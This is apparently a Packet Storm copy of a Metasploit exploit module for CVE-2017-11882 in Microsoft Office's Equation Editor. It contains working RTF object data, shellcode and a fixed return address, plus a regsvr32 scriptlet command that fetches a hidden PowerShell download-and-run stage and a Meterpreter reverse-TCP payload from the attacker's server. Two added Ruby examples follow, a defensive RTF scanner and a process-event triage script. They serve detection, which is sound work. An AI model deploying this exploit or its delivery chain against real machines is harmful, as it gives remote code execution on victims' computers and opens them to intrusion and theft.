https://packetstormsecurity.com/files/145226/Microsoft-Office-Equation-Editor-Code-Execution.html
Microsoft Office Equation Editor Code Execution
Posted Dec 6, 2017
Authored by embedi, Mumbai | Site metasploit.com

This Metasploit module exploits a flaw in how the Equation Editor handles OLE objects in memory to execute arbitrary code using RTF files without interaction.

tags | exploit, arbitrary
advisories | CVE-2017-11882
SHA-256 | 16ad4379e6651e3ce0e9433a9c32d2a5e70809affcfd3f999c329227ce6dbc46

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Office CVE-2017-11882',
      'Description'    => %q{
        This module exploits a flaw in how the Equation Editor handles OLE
        objects in memory, which lets an attacker execute arbitrary code from
        an RTF file without user interaction.
      },
      'Author'         => ['mumbai', 'embedi'],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Nov 15 2017',
      'References'     => [
        ['CVE', '2017-11882'],
        ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
        ['URL', 'https://github.com/embedi/CVE-2017-11882']
      ],
      'Platform'       => 'win',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Targets'        => [
        ['Microsoft Office', {}]
      ],
      'DefaultTarget'  => 0,
      'Payload'        => { 'DisableNops' => true },
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
        'PAYLOAD'  => 'windows/meterpreter/reverse_tcp'
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Filename to save as, or inject', 'msf.rtf']),
      OptString.new('FOLDER_PATH', [false, 'Path to file to inject', nil])
    ])
  end

  # Returns the RTF preamble the object is appended to: either everything
  # before the first {\*\datastore group of an existing document (injection
  # mode, FOLDER_PATH set and the file present) or a minimal generated header.
  def retrieve_header(filename)
    path = datastore['FOLDER_PATH'].nil? ? nil : "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"

    if !path.nil? && ::File.file?(path)
      File.open(path, 'rb') do |fd|
        header = fd.read(fd.stat.size).split('{\*\datastore').first.to_s
        print_status("Injecting #{path}...")
        return header
      end
    end

    header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
    header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
    header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
    header
  end

  def generate_rtf
    header = retrieve_header(datastore['FILENAME'])

    # Embedded Equation.3 object. \objupdate makes Word load the object as soon
    # as the document is opened, so no click is needed. The hex that follows is
    # an OLE1 wrapper plus an OLE compound file (header, FAT, directory with the
    # Root Entry, Ole, CompObj and ObjInfo entries, mini FAT and mini stream);
    # the Equation Native stream content is appended after it as `payload`.
    object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
    object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
    object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
    object_class << '09000600000000000000000000000100000001000000000000000010000002000'
    object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
    object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
    object_class << '07400720079000000000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
    object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
    object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000003'
    object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
    object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
    object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
    object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << "00000300040000000000000000000000000000000000000000000000000000000"
    object_class << "000000000000000000000000000000000000000000000000000000000000000\n"

    # Equation Native stream. The first 28 bytes are the EQNOLEFILEHDR, then the
    # MTEF header, then a FONT record (tag 0x08) whose "name" is the x86 code
    # below; EQNEDT32.EXE copies that name into a fixed-size stack buffer and
    # overruns it. The disassembly comments show the bytes as x86, which only
    # becomes meaningful from the `mov eax` onward.
    shellcode = "\x1c\x00"                  # 0:  1c 00                 sbb al,0x0
    shellcode << "\x00\x00"                 # 2:  00 00                 add BYTE PTR [eax],al
    shellcode << "\x02\x00"                 # 4:  02 00                 add al,BYTE PTR [eax]
    shellcode << "\x9e"                     # 6:  9e                    sahf
    shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7:  c4 a9 00 00 00 00     les ebp,FWORD PTR [ecx+0x0]
    shellcode << "\x00\x00"                 # d:  00 00                 add BYTE PTR [eax],al
    shellcode << "\x00\xc8"                 # f:  00 c8                 add al,cl
    shellcode << "\xa7"                     # 11: a7                    cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
    shellcode << "\\"                       # 12: 5c                    pop esp
    shellcode << "\x00\xc4"                 # 13: 00 c4                 add ah,al
    shellcode << "\xee"                     # 15: ee                    out dx,al
    shellcode << "["                        # 16: 5b                    pop ebx
    shellcode << "\x00\x00"                 # 17: 00 00                 add BYTE PTR [eax],al
    shellcode << "\x00\x00"                 # 19: 00 00                 add BYTE PTR [eax],al
    shellcode << "\x00\x03"                 # 1b: 00 03                 add BYTE PTR [ebx],al
    shellcode << "\x01\x01"                 # 1d: 01 01                 add DWORD PTR [ecx],eax
    shellcode << "\x03\n"                   # 1f: 03 0a                 add ecx,DWORD PTR [edx]
    shellcode << "\n\x01"                   # 21: 0a 01                 or al,BYTE PTR [ecx]
    shellcode << "\x08ZZ"                   # 23: 08 5a 5a              or BYTE PTR [edx+0x5a],bl
    shellcode << "\xB8\x44\xEB\x71\x12"     # 26: b8 44 eb 71 12        mov eax,0x1271eb44
    shellcode << "\xBA\x78\x56\x34\x12"     # 2b: ba 78 56 34 12        mov edx,0x12345678
    shellcode << "\x31\xD0"                 # 30: 31 d0                 xor eax,edx
    shellcode << "\x8B\x08"                 # 32: 8b 08                 mov ecx,DWORD PTR [eax]
    shellcode << "\x8B\x09"                 # 34: 8b 09                 mov ecx,DWORD PTR [ecx]
    shellcode << "\x8B\x09"                 # 36: 8b 09                 mov ecx,DWORD PTR [ecx]
    shellcode << "\x66\x83\xC1\x3C"         # 38: 66 83 c1 3c           add cx,0x3c
    shellcode << "\x31\xDB"                 # 3c: 31 db                 xor ebx,ebx
    shellcode << "\x53"                     # 3e: 53                    push ebx
    shellcode << "\x51"                     # 3f: 51                    push ecx
    shellcode << "\xBE\x64\x3E\x72\x12"     # 40: be 64 3e 72 12        mov esi,0x12723e64
    shellcode << "\x31\xD6"                 # 45: 31 d6                 xor esi,edx
    shellcode << "\xFF\x16"                 # 47: ff 16                 call DWORD PTR [esi]
    shellcode << "\x53"                     # 49: 53                    push ebx
    shellcode << "\x66\x83\xEE\x4C"         # 4a: 66 83 ee 4c           sub si,0x4c
    shellcode << "\xFF\x10"                 # 4e: ff 10                 call DWORD PTR [eax]
    shellcode << "\x90"                     # 50: 90                    nop
    shellcode << "\x90"                     # 51: 90                    nop

    # Padding of the Equation Native stream, the second directory sector holding
    # the "Equation Native" entry (start sector 4, size 0xC5 = 197 bytes), the
    # embedded WMF, then the RTF \result picture and the closing groups.
    footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
    footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
    footer << '00000000000000000000000000000000000000000000000000000'
    footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000400'
    footer << '0000C5000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
    footer << '000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000000000'
    footer << '000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
    footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000001050000050000000D0000004D45544146494C'
    footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
    footer << '500000002001C0000000000050000000902000000000500000002'
    footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
    footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
    footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
    footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'
    footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'
    footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'
    footer << '00030000000000' + "\n"
    footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n"
    footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n"
    footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n"
    footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n"
    footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n"
    footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n"
    footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n"
    footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n"
    footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n"
    footer << "00000000\n"
    footer << "}}}\n"
    footer << '\par}' + "\n"

    # Font name = code above, then the saved return address it overwrites
    # (EQNEDT32.EXE is loaded at a fixed base, so the address is static), then
    # the command string the code hands to WinExec. The stream is padded to the
    # 197 bytes recorded as its size in the directory entry and hex-encoded.
    payload = shellcode
    payload += [0x00402114].pack('V')
    payload += "\x00" * 2
    payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
    payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first

    header + object_class + payload + footer
  end

  def gen_psh(url, *method)
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl

    if method.include? 'string'
      download_string = if datastore['PSH-Proxy']
                          Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
                        else
                          Rex::Powershell::PshMethods.download_and_exec_string(url)
                        end
    else
      # Binary drop-and-run variant. on_request_uri only ever asks for 'string',
      # so this branch (and the BinaryEXE-* options it reads) is not exercised.
      # Random filename to use, if there isn't anything set
      random = "#{rand_text_alphanumeric 8}.exe"
      # Set filename (Use random filename if empty)
      filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
      # Set path (Use %TEMP% if empty)
      path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
      # Join Path and Filename
      file = %Q(echo (#{path}+'\\#{filename}'))
      # Generate download PowerShell command
      download_string = Rex::Powershell::PshMethods.download_run(url, file)
    end

    download_and_run = "#{ignore_cert}#{download_string}"
    # Generate main PowerShell command
    generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
  end

  # Two requests arrive from the target: regsvr32 fetches <uri>.sct, whose
  # scriptlet runs a PowerShell one-liner that then fetches the real payload
  # from <uri>.
  def on_request_uri(cli, request)
    if request.raw_uri =~ /\.sct$/
      print_status("Handling request for .sct from #{cli.peerhost}")
      payload = gen_psh("#{get_uri}", 'string')
      data = gen_sct_file(payload)
      send_response(cli, data, 'Content-Type' => 'text/plain')
    else
      print_status("Delivering payload to #{cli.peerhost}...")
      p = regenerate_payload(cli)
      data = cmd_psh_payload(p.encoded,
                             payload_instance.arch.first,
                             remove_comspec: true,
                             exec_in_place: true)
      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
    end
  end

  def rand_class_id
    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
  end

  def gen_sct_file(command)
    # If the provided command is empty, a correctly formatted response is still
    # needed (otherwise the system raises an error).
    if command == ''
      %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"></registration></scriptlet>}
    # If a command is provided, tell the target system to execute it.
    else
      %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
    end
  end

  def primer
    file_create(generate_rtf)
  end
end
```
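The RTF that generate_rtf writes carries several fixed markers: the \objupdate control word, the Equation.3 progid, the Equation Editor CLSID inside the CompObj stream, the "Equation Native" stream name, and an MTEF FONT record whose name is far longer than any real font name. The scanner below is an added example and not part of the Metasploit module; it hex-decodes each {\*\objdata ...} group and reports those markers. The sample object data it builds is a constructed stand-in that contains only the fields the scanner keys on, not a full OLE compound file, the 40-byte name limit is a heuristic chosen here, and finding the FONT tag in a short window after the MTEF header is a shortcut rather than a full MTEF record walk.

```ruby
# Added example, not part of the Metasploit module: flag RTF files carrying an
# Equation Editor object with an over-long MTEF FONT record name.

# {0002CE02-0000-0000-C000-000000000046} as serialised in the CompObj stream
EQUATION_CLSID = ['02ce020000000000c000000000000046'].pack('H*')
# EQNOLEFILEHDR begins with cbHdr = 0x1c and version = 0x00020000
EQN_HDR_SIG     = "\x1c\x00\x00\x00\x02\x00".b
EQN_HDR_LEN     = 28
MTEF_HDR_LEN    = 5      # version, platform, product, product version, subversion
MTEF_FONT_TAG   = "\x08".b
FONT_NAME_LIMIT = 40     # heuristic threshold; real font names are much shorter

# Decoded bytes of every {\*\objdata ...} group in the RTF text.
def extract_objdata(rtf)
  rtf.scan(/\{\\\*\\objdata\s*([0-9a-fA-F\s]+)\}/).map do |(hex)|
    [hex.delete(" \t\r\n")].pack('H*')
  end
end

# Finds the FONT record after the EQNOLEFILEHDR + MTEF header and measures its
# NUL-terminated name. Looking for the tag within a few bytes of the header is
# a heuristic (assumption), not a parse of every MTEF record type.
def font_record(blob)
  hdr = blob.index(EQN_HDR_SIG)
  return nil unless hdr
  start = hdr + EQN_HDR_LEN + MTEF_HDR_LEN
  tag = blob.index(MTEF_FONT_TAG, start)
  return nil if tag.nil? || tag - start > 8
  name_start = tag + 3                                   # tag, typeface, style
  nul = blob.index("\x00".b, name_start) || blob.bytesize
  { offset: tag, name_length: nul - name_start }
end

def scan_rtf(rtf)
  findings = []
  findings << 'objupdate: object is refreshed on open, no user interaction needed' if rtf.include?('\objupdate')
  findings << 'objclass Equation.3' if rtf =~ /\\objclass\s+Equation\.3/
  extract_objdata(rtf).each_with_index do |blob, i|
    findings << "objdata[#{i}]: Equation Editor CLSID" if blob.include?(EQUATION_CLSID)
    findings << "objdata[#{i}]: Equation Native stream" if blob.include?('Equation Native'.encode('UTF-16LE').b)
    rec = font_record(blob)
    next if rec.nil? || rec[:name_length] <= FONT_NAME_LIMIT
    findings << "objdata[#{i}]: MTEF FONT record at #{rec[:offset]} with #{rec[:name_length]}-byte name (overflow)"
  end
  findings
end

# Constructed stand-in for the real object data: only the fields the scanner
# looks at, in the order Equation Editor stores them.
def build_equation_objdata(font_name)
  blob = "\x01\x05\x00\x00\x02\x00\x00\x00\x0b\x00\x00\x00Equation.3\x00".b   # OLE1 header
  blob << EQUATION_CLSID
  blob << 'Equation Native'.encode('UTF-16LE').b
  blob << EQN_HDR_SIG << ("\x00".b * (EQN_HDR_LEN - EQN_HDR_SIG.bytesize))
  blob << "\x03\x01\x01\x03\x0a".b                       # MTEF header
  blob << "\x0a\x01".b                                   # size and line records
  blob << MTEF_FONT_TAG << "\x5a\x5a".b << font_name.b << "\x00".b
end

def build_rtf(font_name, objupdate: true)
  update = objupdate ? '\objupdate' : ''
  hex = build_equation_objdata(font_name).unpack1('H*')
  "{\\rtf1\\ansi{\\object\\objemb#{update}{\\*\\objclass Equation.3}{\\*\\objdata #{hex}}}\\par}"
end

if __FILE__ == $PROGRAM_NAME
  puts scan_rtf(build_rtf('A' * 47))                            # 47-byte name, as long as the module's
  puts '--'
  puts scan_rtf(build_rtf('Times New Roman', objupdate: false)) # benign equation object
end
```

A benign Equation.3 object still trips the progid, CLSID and stream-name checks, so those are context; the name length and \objupdate are the two signals that separate the module's output from a real equation.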
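After the overflow, EQNEDT32.EXE itself runs "regsvr32 /s /n /u /i:<uri>.sct scrobj.dll", which gives a defender two process-creation signals: the Equation Editor process spawning any child at all, and regsvr32 being pointed at a scriptlet over HTTP(S) through scrobj.dll. The triage below is an added example, not part of the Metasploit module. The log lines are constructed, the "host|parent image|image|command line" layout is an assumption made for the example rather than any product's format, and the last event generalises beyond the page by flagging a cmd.exe child of the Equation Editor, not only regsvr32.

```ruby
# Added example, not part of the Metasploit module: triage process-creation
# events for the second stage CVE-2017-11882 exploitation produces.

# regsvr32 ... /i:<http(s) url>  (named capture for the scriptlet URL)
REGSVR32_SCRIPTLET = %r{\bregsvr32(?:\.exe)?\b.*?/i:\s*"?(?<url>https?://[^\s"]+)}i

# Constructed events in an assumed host|parent|image|cmdline layout.
# Only the first and last should be flagged.
SAMPLE_EVENTS = [
  'ws01|C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|C:\Windows\System32\regsvr32.exe|regsvr32 /s /n /u /i:http://10.0.0.5:8080/abc.sct scrobj.dll',
  'ws01|C:\Windows\explorer.exe|C:\Windows\System32\regsvr32.exe|regsvr32 /s "C:\Program Files\Vendor\vendor.dll"',
  'ws02|C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE|C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
  'ws03|C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|C:\Windows\System32\cmd.exe|cmd /c whoami'
].freeze

# True when the image path names the Equation Editor binary.
def eqnedt32?(image)
  image.to_s =~ /(?:\A|\\)eqnedt32\.exe\z/i ? true : false
end

# The scriptlet URL when the command line is a regsvr32 remote scriptlet load
# (/i:<url> together with scrobj.dll), otherwise nil. A plain local
# "regsvr32 /s something.dll" does not match.
def regsvr32_scriptlet_url(cmdline)
  m = REGSVR32_SCRIPTLET.match(cmdline.to_s)
  return nil unless m && cmdline =~ /\bscrobj\.dll\b/i
  m[:url]
end

# One event in, a finding hash or nil out. Word launching EQNEDT32.EXE is
# normal; EQNEDT32.EXE launching anything is not.
def triage_event(line)
  host, parent, image, cmdline = line.split('|', 4)
  reasons = []
  reasons << :eqnedt32_child if eqnedt32?(parent)
  url = regsvr32_scriptlet_url(cmdline)
  reasons << :regsvr32_scriptlet if url
  return nil if reasons.empty?
  { host: host, parent: parent, image: image, reasons: reasons, url: url }
end

def triage(lines)
  lines.map { |l| triage_event(l) }.compact
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_EVENTS).each do |h|
    puts "#{h[:host]} #{h[:image]} #{h[:reasons].join(',')} #{h[:url]}"
  end
end
```

The parent-process rule is the more durable of the two: it does not depend on the command the attacker chose, only on the fact that the Equation Editor process never needs to create children.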